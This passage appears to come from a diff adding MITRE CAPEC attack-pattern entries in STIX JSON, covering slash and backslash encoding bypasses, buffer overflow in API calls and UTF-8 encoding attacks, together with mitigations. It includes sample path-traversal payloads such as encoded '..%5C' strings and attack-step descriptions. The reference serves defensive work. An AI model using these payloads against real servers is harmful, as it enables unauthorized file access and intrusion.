  1. Manipulate input: Once the adversary determines how to bypass filters that filter out special characters using an escaped slash, they will manipulate the user input in a way that is not intended by the application.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts the backlash character as escape character.", + "The application server does incomplete input data decoding, filtering and validation." + ], + "x_capec_skills_required": { + "Low": "The adversary can naively try backslash character and discover that the target host uses it as escape character.", + "Medium": "The adversary may need deep understanding of the host target in order to exploit the vulnerability. The adversary may also use automated tools to probe for this vulnerability." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify that the user-supplied data does not use backslash character to escape malicious characters.", + "id": "course-of-action--380b117a-6169-466d-a7a6-7d6f047e19a0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9cb4ae43-cf9a-40ac-a774-6c54684220cf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--380b117a-6169-466d-a7a6-7d6f047e19a0", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18db8c39-5734-4976-995e-2b41058357e4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding.", + "id": "course-of-action--5f0544cb-d0a9-41fd-805f-5990ffb5833a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c87e3a8c-ff00-48c7-8fc7-287c0608ac1d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f0544cb-d0a9-41fd-805f-5990ffb5833a", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regular expressions can be used to filter out backslash. Make sure you decode before filtering and validating the untrusted input data.", + "id": "course-of-action--8535a537-b407-4f8c-939a-b5ac6340509b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--91ab6a50-36a5-4861-85ce-aac5a6c7af09", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8535a537-b407-4f8c-939a-b5ac6340509b", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access.", + "id": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--12c4ce97-d297-42dc-a8bc-b477e5c4bffb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f3d2ae6-65d1-4164-a0e0-b2c4925961ba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names.", + "id": "course-of-action--d8d53c86-ce51-4374-9ba7-30c6af721c9b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--937e412f-6548-4f31-b652-45f3f5510579", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8d53c86-ce51-4374-9ba7-30c6af721c9b", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.", + "external_references": [ + { + "external_id": "CAPEC-79", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04", + "external_id": "REF-525", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + } + ], + "id": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes in Alternate Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Slashes in Alternate Encodings\n The two following requests are equivalent on most Web servers:\n http://target server/some_directory\\..\\..\\..\\winnt\n is equivalent to\n http://target server/some_directory/../../../winnt\n Multiple encoding conversion problems can also be leveraged as various slashes are instantiated in URL-encoded, UTF-8, or Unicode. Consider the strings\n http://target server/some_directory\\..%5C..%5C..\\winnt\n where %5C is equivalent to the \\ character.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and looks for areas where user input is used to access resources on the target host. The adversary attempts different encodings of slash characters to bypass input filters.

    2. Techniques
    Try both backslash and forward slash characters
    Try different encodings for slash characters such as %5C

Exploit

  1. Traverse application directories: Once the adversary determines how to bypass filters that filter out slash characters, they will manipulate the user input to include slashes in order to traverse directories and access resources that are not intended for the user.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application server accepts paths to locate resources.", + "The application server does insufficient input data validation on the resource path requested by the user.", + "The access right to resources are not set properly." + ], + "x_capec_skills_required": { + "Low": "An adversary can try variation of the slashes characters.", + "Medium": "An adversary can use more sophisticated tool or script to scan a website and find a path filtering problem." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Refer to the RFCs to safely decode URL.", + "id": "course-of-action--225305ca-bb17-4652-bce6-a3e088e3e753", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a6ee85d-1fc3-4c89-a197-b17473b215bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--225305ca-bb17-4652-bce6-a3e088e3e753", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04f00f04-9695-4b7c-9593-29b78e51dda7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)", + "id": "course-of-action--cfb918e7-7635-4a23-aa5e-27a2f7619338", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70f70a7f-5a5f-479e-ba10-554afaad269a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cfb918e7-7635-4a23-aa5e-27a2f7619338", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77731bb0-70b0-41b9-8671-78db70983fae", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test your path decoding process against malicious input.", + "id": "course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a701d96e-611d-4d01-988e-216e7c28a1a3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--83e41edb-f3d5-444b-b2a9-55f1329f2b68", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the application based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.", + "id": "course-of-action--832594fc-7b68-4057-b3f1-8bda4098d788", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d18cc586-8a23-43d4-b493-6352b03b104a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--832594fc-7b68-4057-b3f1-8bda4098d788", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An adversary who has knowledge of known vulnerable libraries or shared code can easily target software that makes use of these libraries. All clients that make use of the code library thus become vulnerable by association. This has a very broad effect on security across a system, usually affecting more than one software process.", + "external_references": [ + { + "external_id": "CAPEC-8", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/8.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow in an API Call", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Libc in FreeBSD\n A buffer overflow in the FreeBSD utility setlocale (found in the libc module) puts many programs at risk all at once.\n ", + "\n Xtlib\n A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary, with knowledge of vulnerable libraries or shared code modules, identifies a target application or program that makes use of these.

Experiment

  1. Find injection vector: The adversary attempts to use the API, and if they can they send a large amount of data to see if the buffer overflow attack really does work.

    2. Techniques
    Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible.

  2. Craft overflow content: The adversary crafts the content to be injected based on their knowledge of the vulnerability and their desired outcome. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the API as the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host exposes an API to the user.", + "One or more API functions exposed by the target host has a buffer overflow vulnerability." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1904d522-3156-4b2b-8861-ea295dd3490b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--948df80a-6252-4723-93a8-9c5b1a9daa17", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "spec_version": "2.1", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f52fdeab-0159-4aa3-aed5-3de1e3f31e4a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "spec_version": "2.1", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--23598190-f719-4176-baf5-1e00d32e9cec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa5f5375-154b-486b-a60c-7eadb33e0a4f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "spec_version": "2.1", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \"shortest possible\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.", + "external_references": [ + { + "external_id": "CAPEC-80", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/80.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-112", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html" + }, + { + "description": "Michael Howard, David LeBlanc, Writing Secure Code, Microsoft Press", + "external_id": "REF-530", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Bruce Schneier, Security Risks of Unicode, Crypto-Gram Newsletter, 2000--07---15", + "external_id": "REF-531", + "source_name": "reference_from_CAPEC", + "url": "https://www.schneier.com/crypto-gram/archives/2000/0715.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-532", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/UTF-8" + }, + { + "description": "F. 